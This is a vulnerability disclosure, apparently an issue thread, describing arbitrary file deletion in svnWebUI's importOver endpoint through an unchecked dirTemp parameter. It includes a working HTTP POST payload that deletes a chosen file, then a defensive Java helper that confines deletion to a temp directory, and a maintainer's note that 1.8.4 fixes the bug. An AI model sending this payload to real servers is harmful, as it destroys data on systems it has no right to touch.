svnWebUI
The svnwebui system has an arbitrary file deletion vulnerability
com.cym.controller.UserController#importOver
The system did not perform a security check on the parameter dirTemps, which allowed attackers to construct payloads and cause arbitrary file deletion at the FileUtil.del step, which could delete any file.
The following is the process of reproducing the vulnerability:
The current path contains the file test:
After logging into the system, use this payload:

```http
POST /adminPage/user/importOver HTTP/1.1
Host: 192.168.31.227:6060
Content-Length: 27
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.31.227:6060
Referer: http://192.168.31.227:6060/adminPage/user
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: SOLONID=c898caf824614a45a7032dc54291697d; Hm_lvt_2358d52bb43b2c7c42cb5a060c736de6=1712677313; Hm_lpvt_2358d52bb43b2c7c42cb5a060c736de6=1712677380
Connection: close

dirTemp=/home/svnWebUI/test
```

The file has now been deleted.
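A defensive counterpart to the missing check, added here as an illustration and not the project's own fix: a delete helper that only accepts a name relative to a fixed temp directory and refuses anything that resolves outside it. The base directory `/home/svnWebUI/temp`, the class name and the `Outcome` values are assumptions.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.LinkOption;
import java.nio.file.Path;
import java.nio.file.Paths;

public class SafeTempDelete {

    // Assumed directory holding import temp files; the project's real location is not stated in the report.
    private static final Path TEMP_BASE = Paths.get("/home/svnWebUI/temp").toAbsolutePath().normalize();

    /** Result of a delete request, so the caller can log why a value was refused. */
    public enum Outcome { DELETED, NOT_FOUND, REJECTED }

    /**
     * Deletes the temp file named by a client-supplied value, but only when the
     * resolved path stays inside TEMP_BASE. Absolute paths, ".." segments and
     * symlinks that point outside the base are refused before anything is touched.
     */
    public static Outcome deleteTemp(String dirTemp) throws IOException {
        if (dirTemp == null || dirTemp.isEmpty() || Paths.get(dirTemp).isAbsolute()) {
            return Outcome.REJECTED;  // only relative names are meaningful here
        }
        // Lexical check: resolve against the base and collapse ".." before comparing.
        Path candidate = TEMP_BASE.resolve(dirTemp).normalize();
        if (!candidate.startsWith(TEMP_BASE)) {
            return Outcome.REJECTED;
        }
        if (!Files.exists(candidate, LinkOption.NOFOLLOW_LINKS)) {
            return Outcome.NOT_FOUND;
        }
        // Physical check: follow symlinks and confirm the real target is still inside the base.
        Path real = candidate.toRealPath();
        if (!real.startsWith(TEMP_BASE.toRealPath())) {
            return Outcome.REJECTED;
        }
        Files.delete(candidate);  // removes the link itself when candidate is a symlink
        return Outcome.DELETED;
    }

    public static void main(String[] args) throws IOException {
        // The absolute value from the report's request body, a traversal attempt, and an allowed relative name.
        for (String value : new String[] {"/home/svnWebUI/test", "../test", "import-1.csv"}) {
            System.out.println(value + " -> " + deleteTemp(value));
        }
    }
}
```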
ok, I will fix this
1.8.4 fixes this